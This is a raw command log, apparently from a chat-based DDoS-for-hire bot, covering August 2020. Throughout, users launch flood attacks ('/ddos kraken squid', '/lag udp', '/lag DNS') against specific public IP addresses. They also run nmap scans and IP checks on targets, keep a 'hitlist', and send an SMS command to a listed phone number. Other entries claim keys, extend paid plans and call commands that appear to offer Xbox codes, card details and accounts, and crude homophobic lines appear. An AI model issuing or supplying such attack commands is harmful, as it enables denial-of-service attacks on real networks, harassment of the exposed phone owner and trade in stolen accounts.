/boy
/bot
/checkip ip_address
/bot
/methods
/ddos stdhex 24.240.50.100
/plans
/plan
/steam
/dbsearch RVKTAYLORYT
/xboxcode
/xboxcode
/visacard
/accounts
/o/
/Spotify
/nmap 66.24.100.65 80
/nmapresult
/gay
/hitlist
/xboxcode
/claim key
/claim your mom
/daddy
/claim key/claim PLbEh18pMTqyL47FKbpekA5pXk6hH2fxDCwr6LXANzIHmOOJRo
/bugbounty
/T4AP
/Tr4p
/nmapsv 66.24.100.65 80
/nmapresult
/y/o/u/r /m/o/m /g/a/y
/gay
/admin
/accounts
/vpn
/lag
/lag DNS 66.24.100.65 10 10 60 80
/cmd
/sms
/sms 619 492-7168
/sms
/sms (619) 492-7168,
/ping 66.24.100.65
/ping 66.24.100.65
/xboxcode
/xboxxode
/vpn
/expressvpn
[Mon Aug 10 2020 17:36:55 GMT-1100 (Samoa Standard Time)] /plan
[Mon Aug 10 2020 19:04:04 GMT-1100 (Samoa Standard Time)] /methods
[Mon Aug 10 2020 19:09:36 GMT-1100 (Samoa Standard Time)] /ddos kraken squid 209.78.136.15 80 30
[Tue Aug 11 2020 06:21:56 GMT-1100 (Samoa Standard Time)] /plan
[Tue Aug 11 2020 07:35:09 GMT-1100 (Samoa Standard Time)] /plan
[Tue Aug 11 2020 07:50:10 GMT-1100 (Samoa Standard Time)] /methods
[Tue Aug 11 2020 09:33:18 GMT-1100 (Samoa Standard Time)] /plan
[Tue Aug 11 2020 09:53:21 GMT-1100 (Samoa Standard Time)] /lag
[Tue Aug 11 2020 09:55:14 GMT-1100 (Samoa Standard Time)] /methods
[Tue Aug 11 2020 13:48:34 GMT-1100 (Samoa Standard Time)] /plan
[Tue Aug 11 2020 13:59:15 GMT-1100 (Samoa Standard Time)] /claim MOjuxaBiJb8qCjhqvpNsIOcfPPQ751kplZ9lTUwXJBOxUiXikM
[Tue Aug 11 2020 13:59:35 GMT-1100 (Samoa Standard Time)] /generate key
[Tue Aug 11 2020 13:59:58 GMT-1100 (Samoa Standard Time)] /hitlist
[Tue Aug 11 2020 14:00:45 GMT-1100 (Samoa Standard Time)] /sms
[Tue Aug 11 2020 14:32:51 GMT-1100 (Samoa Standard Time)] /ddos kraken squid 71.223.165.189 120
[Tue Aug 11 2020 14:44:58 GMT-1100 (Samoa Standard Time)] /ddos kraken squid 69.143.249.62 120
[Tue Aug 11 2020 15:30:41 GMT-1100 (Samoa Standard Time)] /plan
[Tue Aug 11 2020 16:15:16 GMT-1100 (Samoa Standard Time)] /plan
[Tue Aug 11 2020 16:35:38 GMT-1100 (Samoa Standard Time)] /ddos kraken 24.246.225.27 120
[Tue Aug 11 2020 16:36:11 GMT-1100 (Samoa Standard Time)] /ddos 24.246.225.27 120
[Tue Aug 11 2020 16:37:09 GMT-1100 (Samoa Standard Time)] /ddos kraken squid24.246.225.27 120
[Tue Aug 11 2020 16:37:27 GMT-1100 (Samoa Standard Time)] /plan
[Tue Aug 11 2020 16:38:22 GMT-1100 (Samoa Standard Time)] /ddos kraken squid 24.246.225.27 120
[Tue Aug 11 2020 16:43:20 GMT-1100 (Samoa Standard Time)] /plan
[Tue Aug 11 2020 16:47:59 GMT-1100 (Samoa Standard Time)] /ddos kraken squid 76.84.97.22 120
[Tue Aug 11 2020 16:48:18 GMT-1100 (Samoa Standard Time)] /ping 76.84.97.22
[Tue Aug 11 2020 16:59:41 GMT-1100 (Samoa Standard Time)] /plan
[Tue Aug 11 2020 17:15:45 GMT-1100 (Samoa Standard Time)] /plan
[Tue Aug 11 2020 17:17:10 GMT-1100 (Samoa Standard Time)] /plam
[Tue Aug 11 2020 17:17:28 GMT-1100 (Samoa Standard Time)] /plan
[Tue Aug 11 2020 17:18:38 GMT-1100 (Samoa Standard Time)] /plan
[Tue Aug 11 2020 17:19:06 GMT-1100 (Samoa Standard Time)] /ddos kraken squid 66.24.100.65 120
[Tue Aug 11 2020 17:20:51 GMT-1100 (Samoa Standard Time)] /plan
[Tue Aug 11 2020 17:21:02 GMT-1100 (Samoa Standard Time)] /plan
[Wed Aug 12 2020 05:32:27 GMT-1100 (Samoa Standard Time)] /check up 68.7.66.153
[Wed Aug 12 2020 05:32:49 GMT-1100 (Samoa Standard Time)] /cmd
[Wed Aug 12 2020 05:33:16 GMT-1100 (Samoa Standard Time)] /checkip 68.7.66.153
[Wed Aug 12 2020 06:35:27 GMT-1100 (Samoa Standard Time)] /checkip 24.171.222.75
[Wed Aug 12 2020 08:02:49 GMT-1100 (Samoa Standard Time)] /ddos
[Wed Aug 12 2020 08:20:03 GMT-1100 (Samoa Standard Time)] /addplan <@724616913191436378>
[Thu Aug 13 2020 18:37:32 GMT-1100 (Samoa Standard Time)] /plan
[Thu Aug 13 2020 18:57:38 GMT-1100 (Samoa Standard Time)] /plan
[Thu Aug 13 2020 19:48:17 GMT-1100 (Samoa Standard Time)] /plan
[Thu Aug 13 2020 19:49:16 GMT-1100 (Samoa Standard Time)] /increaseplan <@724616913191436378> 9999y
[Fri Aug 14 2020 12:07:12 GMT-1100 (Samoa Standard Time)] /get plan 646473635363
[Fri Aug 14 2020 14:59:34 GMT-1100 (Samoa Standard Time)] /checkservers
[Fri Aug 14 2020 15:01:23 GMT-1100 (Samoa Standard Time)] /methods
[Fri Aug 14 2020 15:01:39 GMT-1100 (Samoa Standard Time)] /lag
[Fri Aug 14 2020 15:06:53 GMT-1100 (Samoa Standard Time)] /lag udp 73.79.125.159 2 1000 100000 80
[Fri Aug 14 2020 15:07:15 GMT-1100 (Samoa Standard Time)] /cmd
[Fri Aug 14 2020 18:44:42 GMT-1100 (Samoa Standard Time)] /bugbounty
[Fri Aug 14 2020 18:47:15 GMT-1100 (Samoa Standard Time)] /gu
[Fri Aug 14 2020 18:48:16 GMT-1100 (Samoa Standard Time)] /lagstop
[Fri Aug 14 2020 19:12:33 GMT-1100 (Samoa Standard Time)] /plan
[Fri Aug 14 2020 20:51:08 GMT-1100 (Samoa Standard Time)] /hitlist
[Fri Aug 14 2020 20:56:47 GMT-1100 (Samoa Standard Time)] /checkplan <@659975663167471628>
[Fri Aug 14 2020 20:58:36 GMT-1100 (Samoa Standard Time)] /ban <@549814783881248769>
[Fri Aug 14 2020 20:59:11 GMT-1100 (Samoa Standard Time)] /plan
[Fri Aug 14 2020 21:01:15 GMT-1100 (Samoa Standard Time)] /plan
[Fri Aug 14 2020 21:01:41 GMT-1100 (Samoa Standard Time)] /give plan lifetime
[Fri Aug 14 2020 21:02:59 GMT-1100 (Samoa Standard Time)] /clear 10p
[Fri Aug 14 2020 21:03:18 GMT-1100 (Samoa Standard Time)] /clear 100
[Fri Aug 14 2020 21:06:41 GMT-1100 (Samoa Standard Time)] /plan
[Fri Aug 21 2020 08:42:30 GMT-1100 (Samoa Standard Time)] /plan
